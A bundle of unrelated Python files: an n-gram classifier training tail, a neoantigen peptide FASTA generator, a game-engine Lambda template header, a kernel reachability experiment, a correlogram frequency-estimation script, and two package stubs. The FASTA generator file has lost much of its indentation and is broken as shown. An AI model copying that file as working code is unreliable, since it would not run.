    # integer ids before padding every row to config.maxlen.
    t = CountVectorizer(analyzer='char', ngram_range=(config.ngram_min, config.ngram_max))
    X = np.array(
        pad_sequences(
            x_idx.transform(
                t.inverse_transform(
                    t.fit_transform(X)
                ), matrix=True
            ), config.maxlen)
    )
    x_train, x_test, y_train, y_test = train_test_split(X, y, test_size=config.test_size, shuffle=config.shuffle)
    del X, y  # free the full matrices; only the splits are used below
    # Generate batches
    train_batches = prep.generate_instances(
        data=x_train,
        labels_data=y_train,
        n_word=x_idx.max_number() + 1,
        n_label=config.label_size,
        max_timesteps=config.max_timesteps,
        batch_size=config.batch_size)
    validation_batches = prep.generate_instances(
        data=x_test,
        labels_data=y_test,
        n_word=x_idx.max_number() + 1,
        n_label=config.label_size,
        max_timesteps=config.max_timesteps,
        batch_size=config.batch_size)
    # Train the model
    train.train(config, train_batches, validation_batches, x_idx.max_number() + 1, save_path, from_saved=True)
    # Final Validation
    prediction_batches = prep.generate_instances(
        data=x_test,
        labels_data=None,
        n_word=x_idx.max_number() + 1,
        n_label=config.label_size,
        max_timesteps=config.max_timesteps,
        batch_size=config.batch_size)
    # Predict the model
    predicted_labels = predict.predict(config, prediction_batches, x_idx.max_number() + 1, save_path)
    # y_test is truncated to len(predicted_labels) -- presumably predict()
    # drops a ragged final batch; confirm in predict.predict.
    report = classification_report(y_test[:len(predicted_labels)], predicted_labels)
    print(report)
    # Final output: re-vectorize the held-out test file; add_if_new=False
    # keeps unseen n-grams out of the trained index.
    x_test_path = 'data/xtest.txt'
    X = prep.read_file(x_test_path, raw=True)
    t = CountVectorizer(analyzer='char', ngram_range=(config.ngram_min, config.ngram_max))
    X = np.array(
        pad_sequences(
            x_idx.transform(
                t.inverse_transform(
                    t.fit_transform(X)
                ), matrix=True, add_if_new=False
            ), config.maxlen)
    )
    prediction_batches = prep.generate_instances(
        data=X,
        labels_data=None,
        n_word=x_idx.max_number() + 1,
        n_label=config.label_size,
        max_timesteps=config.max_timesteps,
        batch_size=config.batch_size)
    predicted_labels = predict.predict(config, prediction_batches, x_idx.max_number() + 1, save_path,
                                       write_to_file=True)
# Script entry point.
if __name__ == '__main__':
    run()
|
import csv
import json
import re
import sys
from collections import OrderedDict, defaultdict
import yaml
from abc import ABCMeta
from Bio import SeqIO
import itertools
from lib.proximal_variant import ProximalVariant
csv.field_size_limit(sys.maxsize)
class FastaGenerator(metaclass=ABCMeta):
def parse_proximal_variants_file(self):
if self.proximal_variants_file is not None:
proximal_variants = defaultdict(lambda: defaultdict(list))
with open(self.proximal_variants_file, 'r') as fh:
tsvin = csv.DictReader(fh, delimiter='\t')
for line in tsvin:
proximal_variants[line['main_somatic_variant']][line['protein_position']].append(line)
return proximal_variants
else:
return {}
    def __init__(self, **kwargs):
        """Collect generator settings from keyword arguments.

        Required keys: input_file, flanking_sequence_length, epitope_length,
        output_file, output_key_file.
        Optional keys: downstream_sequence_length, proximal_variants_file.
        """
        self.input_file = kwargs['input_file']
        self.flanking_sequence_length = kwargs['flanking_sequence_length']
        self.epitope_length = kwargs['epitope_length']
        self.output_file = kwargs['output_file']
        self.output_key_file = kwargs['output_key_file']
        self.downstream_sequence_length = kwargs.pop('downstream_sequence_length', None)
        self.proximal_variants_file = kwargs.pop('proximal_variants_file', None)
        # Parsed eagerly so later lookups are plain dict accesses.
        self.proximal_variants = self.parse_proximal_variants_file()
def position_out_of_bounds(self, position, sequence):
return position > len(sequence)-1
    #This subroutine is a bit funky but it was designed that way to mirror
    #distance_from_end to increase code readability from the caller's perspective
    def distance_from_start(self, position, string):
        """Number of characters before *position* in *string* (the position itself)."""
        return position
    def distance_from_end(self, position, string):
        """Number of characters after *position* in *string*."""
        return len(string) - 1 - position
def get_wildtype_subsequence(self, position, full_wildtype_sequence, wildtype_amino_acid_length, line):
##clip by wt sequence length, otherwise with deletions peptide_sequence_length may exceeds full wt sequence length,
##and the code below tries extracting ranges beyond the wt sequence
peptide_sequence_length = min(2 * self.flanking_sequence_length + wildtype_amino_acid_length, len(full_wildtype_sequence))
# We want to extract a subset from full_wildtype_sequence that is
# peptide_sequence_length long so that the position ends
# up in the middle of the extracted sequence.
# If the position is too far toward the beginning or end of
# full_wildtype_sequence there aren't enough amino acids on one side
# to achieve this.
if self.distance_from_start(position, full_wildtype_sequence) < self.flanking_sequence_length:
wildtype_subsequence = full_wildtype_sequence[:peptide_sequence_length]
mutation_position = position
elif self.distance_from_end(position, full_wildtype_sequence) < self.flanking_sequence_length:
start_position = len(full_wildtype_sequence) - peptide_sequence_length
wildtype_subsequence = full_wildtype_sequence[start_position:]
mutation_position = peptide_sequence_length - self.distance_from_end(position, full_wildtype_sequence) - 1
elif self.distance_from_start(position, full_wildtype_sequence) >= self.flanking_sequence_length and self.distance_from_end(position, full_wildtype_sequence) >= self.flanking_sequence_length:
start_position = position - self.flanking_sequence_length
end_position = start_position + peptide_sequence_length
wildtype_subsequence = full_wildtype_sequence[start_position:end_position]
mutation_position = self.flanking_sequence_length
else:
sys.exit("ERROR: Something went wrong during the retrieval of the wildtype sequence at position(%s, %s, %s)" % line['chromsome_name'], line['start'], line['stop'])
return mutation_position, wildtype_subsequence
def get_frameshift_subsequences(self, position, full_wildtype_sequence, full_mutant_sequence):
if position < self.flanking_sequence_length:
start_position = 0
else:
start_position = position - self.flanking_sequence_length
wildtype_subsequence_stop_position = position + self.flanking_sequence_length
wildtype_subsequence = full_wildtype_sequence[start_position:wildtype_subsequence_stop_position]
if self.downstream_sequence_length:
mutant_subsequence_stop_position = position + self.downstream_sequence_length
mutant_subsequence = full_mutant_sequence[start_position:mutant_subsequence_stop_position]
else:
mutant_subsequence = full_mutant_sequence[start_position:]
left_flanking_sequence = full_mutant_sequence[start_position:position]
return wildtype_subsequence, mutant_subsequence, left_flanking_sequence
    def add_proximal_variants(self, somatic_variant_index, wildtype_subsequence, mutation_position, original_position, germline_variants_only):
        """Apply nearby (proximal) missense variants onto *wildtype_subsequence*.

        mutation_position is the mutation's index inside the subsequence and
        original_position its index in the full protein; their difference
        converts full-protein coordinates to subsequence coordinates.
        When germline_variants_only is True, somatic proximal variants are
        ignored. Returns the (possibly modified) subsequence.
        """
        mutation_offset = original_position - mutation_position
        wildtype_subsequence_with_proximal_variants = wildtype_subsequence
        if somatic_variant_index in self.proximal_variants.keys():
            for (protein_position, lines) in self.proximal_variants[somatic_variant_index].items():
                # NOTE(review): protein_position is a str (TSV field) while
                # original_position is an int, so this equality presumably
                # never fires -- confirm the intended skip of the main variant.
                if protein_position == original_position:
                    continue
                if germline_variants_only:
                    filtered_lines = [line for line in lines if line['type'] == 'germline']
                else:
                    filtered_lines = lines
                if len(filtered_lines) == 0:
                    continue
                elif len(filtered_lines) == 1:
                    line = filtered_lines[0]
                    proximal_variant_wildtype_amino_acid, proximal_variant_mutant_amino_acid = line['amino_acid_change'].split('/')
                else:
                    # Several variants hit the same codon: merge their codon changes.
                    line = filtered_lines[0]
                    proximal_variant_wildtype_amino_acid = line['amino_acid_change'].split('/')[0]
                    codon_changes = [ item['codon_change'] for item in filtered_lines ]
                    proximal_variant_mutant_amino_acid = ProximalVariant.combine_conflicting_variants(codon_changes)
                # Convert 1-based protein position into a subsequence index.
                proximal_variant_position = int(protein_position) - 1 - mutation_offset
                if proximal_variant_position <= 0 or proximal_variant_position >= len(wildtype_subsequence):
                    continue
                if len(proximal_variant_wildtype_amino_acid) != len(proximal_variant_mutant_amino_acid):
                    print("Nearby variant is not a missense mutation. Skipping.")
                    continue
                # Sanity check: the subsequence must agree with the recorded wildtype residue.
                if wildtype_subsequence[proximal_variant_position] != proximal_variant_wildtype_amino_acid:
                    sys.exit(
                        "Error when processing proximal variant.\n" +
                        "The wildtype amino acid for variant %s with substring %s is different than expected.\n" % (somatic_variant_index, wildtype_subsequence) +
                        "Actual wildtype amino acid: %s\n" % wildtype_subsequence[proximal_variant_position] +
                        "Wildtype amino acid of the proximal_variant: %s" % proximal_variant_wildtype_amino_acid
                    )
                wildtype_subsequence_with_proximal_variants = wildtype_subsequence_with_proximal_variants[:proximal_variant_position] + proximal_variant_mutant_amino_acid + wildtype_subsequence_with_proximal_variants[proximal_variant_position+1:]
        return wildtype_subsequence_with_proximal_variants
def execute(self):
reader = open(self.input_file, 'r')
tsvin = csv.DictReader(reader, delimiter='\t')
fasta_sequences = OrderedDict()
for line in tsvin:
variant_type = line['variant_type']
full_wildtype_sequence = line['wildtype_amino_acid_sequence']
if variant_type == 'FS':
position = int(line['protein_position'].split('-', 1)[0]) - 1
elif variant_type == 'missense' or variant_type == 'inframe_ins':
if '/' not in line['amino_acid_change']:
continue
wildtype_amino_acid, mutant_amino_acid = line['amino_acid_change'].split('/')
if '*' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('*')[0]
elif 'X' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('X')[0]
if '*' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('*')[0]
stop_codon_added = True
elif 'X' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('X')[0]
stop_codon_added = True
else:
stop_codon_added = False
if wildtype_amino_acid == '-':
position = int(line['protein_position'].split('-', 1)[0])
wildtype_amino_acid_length = 0
else:
if '-' in line['protein_position']:
position = int(line['protein_position'].split('-', 1)[0]) - 1
wildtype_amino_acid_length = len(wildtype_amino_acid)
else:
position = int(line['protein_position']) - 1
wildtype_amino_acid_length = len(wildtype_amino_acid)
elif variant_type == 'inframe_del':
variant_type = 'inframe_del'
wildtype_amino_acid, mutant_amino_acid = line['amino_acid_change'].split('/')
if '*' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('*')[0]
elif 'X' in wildtype_amino_acid:
wildtype_amino_acid = wildtype_amino_acid.split('X')[0]
if '*' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('*')[0]
stop_codon_added = True
elif 'X' in mutant_amino_acid:
mutant_amino_acid = mutant_amino_acid.split('X')[0]
stop_codon_added = True
else:
stop_codon_added = False
position = int(line['protein_position'].split('-', 1)[0]) - 1
wildtype_amino_acid_length = len(wildtype_amino_acid)
if mutant_amino_acid == '-':
mutant_amino_acid = ''
else:
continue
if self.position_out_of_bounds(position, full_wildtype_sequence):
continue
if variant_type == 'missense' and line['index'] in self.proximal_variants and line['protein_position'] in self.proximal_variants[line['index']]:
codon_changes = [ item['codon_change'] for item in self.proximal_variants[line['index']][line['protein_position']] ]
codon_changes.append(line['codon_change'])
mutant_amino_acid_with_proximal_variants = ProximalVariant.combine_conflicting_variants(codon_changes)
elif variant_type != 'FS':
mutant_amino_acid_with_proximal_variants = mutant_amino_acid
if variant_type == 'FS':
full_mutant_sequence = line['frameshift_amino_acid_sequence']
wildtype_subsequence, mutant_subsequence, left_flanking_subsequence = self.get_frameshift_subsequences(position, full_wildtype_sequence, full_mutant_sequence)
mutation_start_position = len(left_flanking_subsequence)
wildtype_subsequence = self.add_proximal_variants(line['index'], wildtype_subsequence, mutation_start_position, position, True)
left_flanking_subsequence_with_proximal_variants = self.add_proximal_variants(line['index'], left_flanking_subsequence, mutation_start_position, position, False)
#The caveat here is that if a nearby variant is in the downstream sequence, the protein sequence would be further altered, which we aren't taking into account.
#we would need to recalculate the downstream protein sequence taking all downstream variants into account.
mutant_subsequence = re.sub('^%s' % left_flanking_subsequence, left_flanking_subsequence_with_proximal_variants, mutant_subsequence)
else:
mutation_start_position, wildtype_subsequence = self.get_wildtype_subsequence(position, full_wildtype_sequence, wildtype_amino_acid_length, line)
mutation_end_position = mutation_start_position + wildtype_amino_acid_length
if wildtype_amino_acid != '-' and wildtype_amino_acid != wildtype_subsequence[mutation_start_position:mutation_end_position]:
if line['amino_acid_change'].split('/')[0].count('*') > 1:
print("Warning: Amino acid change is not sane - contains multiple stops. Skipping entry {}".format(line['index']))
continue
else:
sys.exit("ERROR: There was a mismatch between the actual wildtype amino acid sequence ({}) and the expected amino acid sequence ({}). Did you use the same reference build version for VEP that you used for creating the VCF?\n{}".format(wildtype_subsequence[mutation_start_position:mutation_end_position], wildtype_amino_acid, line))
wildtype_subsequence_with_proximal_variants = self.add_proximal_variants(line['index'], wildtype_subsequence, mutation_start_position, position, False)
wildtype_subsequence = self.add_proximal_variants(line['index'], wildtype_subsequence, mutation_start_position, position, True)
if stop_codon_added:
mutant_subsequence = wildtype_subsequence_with_proximal_variants[:mutation_start_position] + mutant_amino_acid_with_proximal_variants
else:
mutant_subsequence = wildtype_subsequence_with_proximal_variants[:mutation_start_position] + mutant_amino_acid_with_proximal_variants + wildtype_subsequence_with_proximal_variants[mutation_end_position:]
if '*' in wildtype_subsequence or '*' in mutant_subsequence:
continue
if 'X' in wildtype_subsequence or 'X' in mutant_subsequence:
continue
if 'U' in wildtype_subsequence or 'U' in mutant_subsequence:
print("Warning. Sequence contains unsupported amino acid U. Skipping entry {}".format(line['index']))
continue
if mutant_subsequence in wildtype_subsequence:
#This is not a novel peptide
continue
if len(wildtype_subsequence) < self.epitope_length or len(mutant_subsequence) < self.epitope_length:
continue
variant_id = line['index']
for designation, subsequence in zip(['WT', 'MT'], [wildtype_subsequence, mutant_subsequence]):
key = '%s.%s' % (designation, variant_id)
fasta_sequences.setdefault(subsequence, []).append(key)
writer = open(self.output_file, 'w')
key_writer = open(self.output_key_file, 'w')
count = 1
for (subsequence, keys) in fasta_sequences.items():
writer.writelines('>%s\n' % count)
writer.writelines('%s\n' % subsequence)
yaml.dump({count: keys}, key_writer, default_flow_style=False)
count += 1
reader.close()
writer.close()
key_writer.close()
class FusionFastaGenerator(FastaGenerator):
    """Generate a FASTA file (and YAML key file) of fusion peptide subsequences.

    Reads a TSV of fusion variants, extracts a peptide window around each
    fusion position, and writes unique subsequences to ``self.output_file``
    with an index-to-variant mapping in ``self.output_key_file``.
    """

    def execute(self):
        """Run the generation end-to-end.

        Fix: the input, output, and key files were previously opened without
        context managers (leaked on any exception), and single strings were
        written via ``writelines`` (which iterates characters) instead of
        ``write``.
        """
        fasta_sequences = OrderedDict()
        with open(self.input_file, 'r') as reader:
            tsvin = csv.DictReader(reader, delimiter='\t')
            for line in tsvin:
                variant_type = line['variant_type']
                position = int(line['protein_position'])
                sequence = line['fusion_amino_acid_sequence']
                # Clamp the window start so it never precedes the sequence.
                if position < self.flanking_sequence_length:
                    start_position = 0
                else:
                    start_position = position - self.flanking_sequence_length
                if variant_type == 'inframe_fusion':
                    # Symmetric window around the fusion position.
                    stop_position = position + self.flanking_sequence_length
                    subsequence = sequence[start_position:stop_position]
                elif variant_type == 'frameshift_fusion':
                    # Frameshifts alter everything downstream; take either a
                    # bounded downstream window or the full remaining sequence.
                    if self.downstream_sequence_length:
                        stop_position = position + self.downstream_sequence_length
                        subsequence = sequence[start_position:stop_position]
                    else:
                        subsequence = sequence[start_position:]
                else:
                    continue
                # Trim a trailing stop marker, then skip any sequence that
                # still contains a stop (*) or unknown (X) residue.
                if subsequence.endswith('X'):
                    subsequence = subsequence[:-1]
                if '*' in subsequence or 'X' in subsequence:
                    continue
                if len(subsequence) < self.epitope_length:
                    continue
                fasta_sequences.setdefault(subsequence, []).append(line['index'])
        # Context managers guarantee the outputs are closed even on error.
        with open(self.output_file, 'w') as writer, \
                open(self.output_key_file, 'w') as key_writer:
            for count, (subsequence, keys) in enumerate(fasta_sequences.items(), start=1):
                writer.write('>%s\n' % count)
                writer.write('%s\n' % subsequence)
                yaml.dump({count: keys}, key_writer, default_flow_style=False)
class VectorFastaGenerator():
    """Generate per-epitope-length FASTA files of peptide junction sequences.

    For every ordered pair of input peptides, the tail of the first peptide is
    joined to the head of the second (optionally around a spacer) so that the
    junction epitopes created by concatenation can be evaluated.
    """

    def __init__(self, **kwargs):
        self.input_file = kwargs['input_file']  # FASTA of peptide sequences
        self.output_file_prefix = kwargs['output_file_prefix']
        self.epitope_lengths = kwargs['epitope_lengths']
        self.spacers = kwargs['spacers']  # spacer strings; 'None' means no spacer

    def execute(self):
        """Build junction sequences and write one FASTA + key file per length."""
        seq_dict = dict()
        # Bugfix: this flag was previously (re)assigned inside the loop, so
        # only the LAST record determined whether problematic-peptide handling
        # ran (and an empty input raised NameError). Initialize once and latch.
        contains_problematic_peptides = False
        for record in SeqIO.parse(self.input_file, "fasta"):
            data = {'seq': str(record.seq)}
            if record.id != record.description:
                # Extra JSON metadata (problematic_start/problematic_end) is
                # carried in the description after the first space.
                data.update(json.loads(record.description.split(' ', 1)[1]))
                contains_problematic_peptides = True
            seq_dict[record.id] = data
        seq_keys = sorted(seq_dict)
        if contains_problematic_peptides:
            seq_tuples = self.combine_problematic_peptides(seq_dict)
        else:
            seq_tuples = list(itertools.permutations(seq_keys, 2))
        for length in self.epitope_lengths:
            epitopes = dict()
            fasta_sequences = OrderedDict()
            wingspan_length = length - 1
            for seq1, seq2 in seq_tuples:
                seq1_seq = seq_dict[seq1]['seq']
                seq2_seq = seq_dict[seq2]['seq']
                # Junction window: tail of seq1 + (spacer) + head of seq2.
                trunc_seq1 = seq1_seq[(len(seq1_seq) - wingspan_length):len(seq1_seq)]
                trunc_seq2 = seq2_seq[0:wingspan_length]
                for this_spacer in self.spacers:
                    if this_spacer != 'None':
                        seq_ID = seq1 + "|" + this_spacer + "|" + seq2
                        epitopes[seq_ID] = (trunc_seq1 + this_spacer + trunc_seq2)
                    else:
                        seq_ID = seq1 + "|" + seq2
                        epitopes[seq_ID] = trunc_seq1 + trunc_seq2
            for seq_id, sequence in epitopes.items():
                if len(sequence) < length:
                    continue
                fasta_sequences.setdefault(sequence, []).append(seq_id)
            output_file = "{}.{}.tsv".format(self.output_file_prefix, length)
            output_key_file = "{}.key".format(output_file)
            # Context managers guarantee the files are closed on error.
            with open(output_file, 'w') as writer, \
                    open(output_key_file, 'w') as key_writer:
                for count, (subsequence, keys) in enumerate(sorted(fasta_sequences.items()), start=1):
                    writer.write('>%s\n' % count)
                    writer.write('%s\n' % subsequence)
                    yaml.dump({count: keys}, key_writer, default_flow_style=False)

    def combine_problematic_peptides(self, seq_dict):
        """Return ordered (left, right) pairs such that a problematic start is
        always preceded by another peptide and a problematic end is always
        followed by one.

        Records that lack the problematic metadata are treated as clean
        (previously they raised KeyError when only some records carried it).
        """
        seq_tuples = []
        for (seq_id, data) in seq_dict.items():
            other_seq_ids = list(seq_dict.keys())
            other_seq_ids.remove(seq_id)
            if data.get('problematic_start'):
                for other_seq_id in other_seq_ids:
                    seq_tuples.append((other_seq_id, seq_id))
            if data.get('problematic_end'):
                for other_seq_id in other_seq_ids:
                    seq_tuples.append((seq_id, other_seq_id))
        return list(set(seq_tuples))
|
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# $Revision: #9 $
#
# If the resource group defines one or more AWS Lambda Function resources, you can put
# the code that implements the functions below. The Handler property of the Lambda
# Function resource definition in the group's resource-template.json file identifies
# the Python function that is called when the Lambda Function is executed. To call
# a function here in main.py, set the Handler property to "main.FUNCTION_NAME".
#
# IMPORTANT: If the game executes the Lambda Function (which is often the case), then
# you must configure player access for the Lambda Function. This is done by including
# the CloudCanvas Permission metadata on the Lambda Function resource definition.
#
import boto3 # Python AWS API
import CloudCanvas # Access Settings using get_setting("SETTING_NAME")
# Setting values come from the Settings property of the AWS Lambda Function's
# configuration resource definition in the resource groups's resource-template.json
# file.
#
# You can use settings to pass resource template parameter values to the Lambda
# Function. The template parameter's default values can be overridden using the
# project's project-settings.json file. You can provide different parameter values
# for each deployment.
#
# You can also use settings to pass a resource's physical id to the Lambda Function.
# The Lambda Function code can use the physical id to access the AWS resource using
# the boto3 api.
|
import numpy as np
from sacred import Experiment
from sacred import Ingredient
from time import perf_counter
from functools import lru_cache
from functools import partial
from gym.spaces import Box
from gym_socks.envs.integrator import NDIntegratorEnv
from gym_socks.sampling import random_sampler
from gym_socks.sampling import sample
from gym_socks.sampling import default_sampler
from gym_socks.algorithms.reach import kernel_sr
from sklearn.metrics.pairwise import rbf_kernel
ex = Experiment()
@ex.config
def ex_config():
    # Sacred config function: each local variable below becomes a named
    # experiment parameter that sacred injects into @ex.capture'd functions
    # by name, so these identifiers must not be renamed.
    dimensionality = 2  # state-space dimension of the integrator system
    time_horizon = 10  # number of time steps of the reachability problem
    sample_size = 1000  # size of the training sample
    test_sample_size = 1000  # number of evaluation (test) points
    problem = "THT"  # problem type passed to kernel_sr — presumably "terminal hitting time"; confirm against kernel_sr docs
    regularization_param = 1  # regularization for the kernel-based algorithm
    sigma = 0.1  # RBF kernel bandwidth; gamma = 1 / (2 * sigma**2) in main()
@lru_cache(maxsize=1)
@ex.capture
def generate_dataset(env, sample_size):
    """Generate the sample (dataset) for the experiment.

    Draws states uniformly from a box slightly larger than the unit box and
    actions from the environment's action space; cached so repeated calls with
    the same arguments reuse the same sample.
    """
    state_space = Box(
        low=-1.1,
        high=1.1,
        shape=env.state_space.shape,
        dtype=env.state_space.dtype,
    )
    return sample(
        sampler=default_sampler(
            state_sampler=random_sampler(sample_space=state_space),
            action_sampler=random_sampler(sample_space=env.action_space),
            env=env,
        ),
        sample_size=sample_size,
    )
@lru_cache(maxsize=1)
@ex.capture
def generate_test_dataset(env, test_sample_size):
    """Generate the test dataset."""
    # Test points are drawn from the [-1, 1] unit box over the state space.
    sample_space = Box(
        low=-1,
        high=1,
        shape=env.state_space.shape,
        dtype=env.state_space.dtype,
    )
    # NOTE(review): unlike generate_dataset, `random_sampler` is passed
    # uncalled and `sample_space` is given as a separate kwarg — presumably
    # `sample` forwards extra kwargs to the sampler; confirm against the
    # gym_socks sampling API.
    T = sample(
        sampler=random_sampler,
        sample_size=test_sample_size,
        sample_space=sample_space,
    )
    return T
def generate_constraint_tube(env, time_horizon):
    """Generate the constraint tube: the [-1, 1] unit box at every time step."""
    unit_box = Box(
        low=-1,
        high=1,
        shape=env.state_space.shape,
        dtype=env.state_space.dtype,
    )
    # List multiplication repeats the SAME Box instance for each step,
    # matching the original aliasing behavior.
    return [unit_box] * time_horizon
def generate_target_tube(env, time_horizon):
    """Generate the target tube: the [-0.5, 0.5] box at every time step."""
    target_box = Box(
        low=-0.5,
        high=0.5,
        shape=env.state_space.shape,
        dtype=env.state_space.dtype,
    )
    # List multiplication repeats the SAME Box instance for each step,
    # matching the original aliasing behavior.
    return [target_box] * time_horizon
@ex.main
def main(
    dimensionality,
    time_horizon,
    sample_size,
    test_sample_size,
    problem,
    regularization_param,
    sigma,
):
    """Run one timed kernel stochastic-reachability computation.

    All parameters are injected by sacred from `ex_config`. Returns the
    elapsed wall-clock time in seconds (perf_counter based).
    """
    env = NDIntegratorEnv(dim=dimensionality)
    # Dataset generation happens OUTSIDE the timed region.
    S = generate_dataset(env, sample_size)
    T = generate_test_dataset(env, test_sample_size)
    start_time = perf_counter()
    # Algorithm setup.
    # NOTE(review): the timer starts before tube construction, so the
    # reported time includes building the constraint/target tubes.
    constraint_tube = generate_constraint_tube(env, time_horizon)
    target_tube = generate_target_tube(env, time_horizon)
    # Main algorithm.
    kernel_sr(
        S=S,
        T=T,
        time_horizon=time_horizon,
        constraint_tube=constraint_tube,
        target_tube=target_tube,
        problem=problem,
        regularization_param=regularization_param,
        kernel_fn=partial(rbf_kernel, gamma=1 / (2 * (sigma ** 2))),
        verbose=False,
    )
    elapsed_time = perf_counter() - start_time
    return elapsed_time
# Script entry point: let sacred parse command-line arguments and run `main`.
if __name__ == "__main__":
    ex.run_commandline()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 12 18:20:39 2019
@author: nico
"""
import sys
sys.path.append('/home/nico/Documentos/facultad/6to_nivel/pds/git/pdstestbench')
from spectrum import CORRELOGRAMPSD
import os
import matplotlib.pyplot as plt
import numpy as np
from scipy.fftpack import fft
import pandas as pd
os.system ("clear") # clear the Python console
plt.close("all") # close all open figures

# Simulation parameters for the Monte Carlo frequency-estimation experiment.
N = 1000  # signal length in samples
Nexp = 200  # number of Monte Carlo realizations
fs = 2*np.pi # sampling frequency (rad/s)
df = fs/N  # spectral resolution
f0 = np.pi / 2  # nominal tone frequency (rad)
M = 100  # correlogram lag (window length for Blackman-Tukey)
mu = 0 # noise mean (mu)
var = 2 # noise variance
SNR = [-15, -8] # signal-to-noise ratios in dB
# Tone amplitudes derived from the target SNRs and the noise variance.
a1 = 2*np.sqrt(var)*pow(10,SNR[0]/20)
a2 = 2*np.sqrt(var)*pow(10,SNR[1]/20)
# Frequency-offset interval [-df/2, df/2) around the nominal frequency.
a = (-1/2) *df
b = (1/2) * df

#%% random frequency generation
fa = np.random.uniform(a, b, size = (Nexp)) # draw uniform random offsets
f1 = f0 + fa  # actual tone frequency of each realization

# Sanity-check histogram of the uniform frequency offsets.
plt.hist(fa, bins=10, alpha=1, edgecolor = 'black', linewidth=1)
plt.ylabel('frequencia')
plt.xlabel('valores')
plt.title('Histograma Uniforme')
plt.savefig("Histograma.png")
plt.show()
del fa
#%% signal generation (noise)
# White Gaussian noise: columns are independent N-sample realizations.
noise= np.vstack(np.transpose([ np.random.normal(0, np.sqrt(var), N) for j in range(Nexp)]))
# Noise periodogram in dB.
fftnoise = 10*np.log10(np.abs(fft(noise, axis=0)/N)**2)

#%% PSD plot of the noise
jj = np.linspace(0, (N-1)*df, N)
plt.figure("PSD ruido", constrained_layout=True)
plt.title("PSD ruido")
plt.plot(jj, fftnoise, marker='.')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Amplitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.grid()

#%% signal generation (sinusoids) and Blackman-Tukey estimation
tt = np.linspace(0, (N-1)/fs, N)
senoidal1 = np.vstack(np.transpose([a1 * np.sin(2*np.pi*j*tt) for j in f1]))
senoidal2 = np.vstack(np.transpose([a2 * np.sin(2*np.pi*j*tt) for j in f1]))
del tt
signal1 = senoidal1 + noise
signal2 = senoidal2 + noise
# Blackman-Tukey correlogram PSD (Bartlett lag window, M lags), one column
# per Monte Carlo realization.
S_BT1 = np.vstack(np.transpose([CORRELOGRAMPSD(signal1[:,ii],window='bartlett', lag=M, NFFT=N) for ii in range(Nexp)]))
S_BT1 = 10*np.log10(S_BT1 *2/N)
S_BT2 = np.vstack(np.transpose([CORRELOGRAMPSD(signal2[:,ii],window='bartlett', lag=M, NFFT=N) for ii in range(Nexp)]))
S_BT2 = 10*np.log10(S_BT2 *2/N)
# Frequency estimate: location of the PSD peak over the first half-spectrum.
freq_hat1 = np.argmax(S_BT1[:int(N/2)-1,:], axis=0)*df # estimate the frequency
freq_hat2 = np.argmax(S_BT2[:int(N/2)-1,:], axis=0)*df # estimate the frequency
error_freq1 = np.abs(freq_hat1 - f1)/f1 # relative (not absolute) estimation error
error_freq2 = np.abs(freq_hat2 - f1)/f1 # relative (not absolute) estimation error
error_medio1 = np.mean(error_freq1)  # mean relative error
error_medio2 = np.mean(error_freq2)  # mean relative error
varianza1_BT = np.var(error_freq1)  # error variance, estimator 1
varianza2_BT = np.var(error_freq2)  # error variance, estimator 2
#%% PSD plots of the estimates
# NOTE(review): figure titles mention "a1 = 3dB"/"a1 = 10dB" while the
# configured SNR values above are [-15, -8] dB — confirm the intended labels.
ff = np.linspace(0, (N-1)*df, N)
plt.figure("PSD con a1 = 3dB", constrained_layout=True)
plt.title("PSD con a1 = 3dB")
plt.plot(ff, S_BT1, marker='.')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Amplitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.grid()

# Relative-error plot, estimator 1
plt.figure("Error al estimar la frecuencia con a1 = 3dB", constrained_layout=True)
plt.title("Error al estimar la frecuencia con a1 = 3dB")
plt.plot(f1, error_freq1,'*r')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Error relativo")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.xlim((min(f1), max(f1)))
plt.grid()

plt.figure("PSD con a1 = 10dB", constrained_layout=True)
plt.title("PSD con a1 = 10dB")
plt.plot(ff, S_BT2, marker='.')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Amplitud [dB]")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.grid()

# Relative-error plot, estimator 2
plt.figure("Error al estimar la frecuencia con a1 = 10dB", constrained_layout=True)
plt.title("Error al estimar la frecuencia con a1 = 10dB")
plt.plot(f1, error_freq2,'*r')
plt.xlabel('frecuecnia [rad]')
plt.ylabel("Error relativo")
plt.axhline(0, color="black")
plt.axvline(0, color="black")
plt.xlim((min(f1), max(f1)))
plt.grid()
|
from .connection import GibsonConnection, create_connection
from .errors import (GibsonError, ProtocolError, ReplyError,
ExpectedANumber, MemoryLimitError, KeyLockedError)
from .pool import GibsonPool, create_pool, create_gibson
__version__ = '0.1.3'

# Reference every re-exported name once so linters (pyflakes) don't flag the
# imports above as unused; this tuple expression has no runtime effect.
(GibsonConnection, create_connection, GibsonError, ProtocolError, ReplyError,
 ExpectedANumber, MemoryLimitError, KeyLockedError, GibsonPool,
 create_pool, create_gibson)
|
from .metadata import Metadata
from . import errors
class Check(Metadata):
    """Check representation.

    API      | Usage
    -------- | --------
    Public   | `from frictionless import Checks`

    It's an interface for writing Frictionless checks.

    Parameters:
        descriptor? (str|dict): schema descriptor

    Raises:
        FrictionlessException: raise if metadata is invalid
    """

    code = "check"
    Errors = []  # type: ignore

    def __init__(self, descriptor=None, *, function=None):
        super().__init__(descriptor)
        self.setinitial("code", self.code)
        self.__function = function
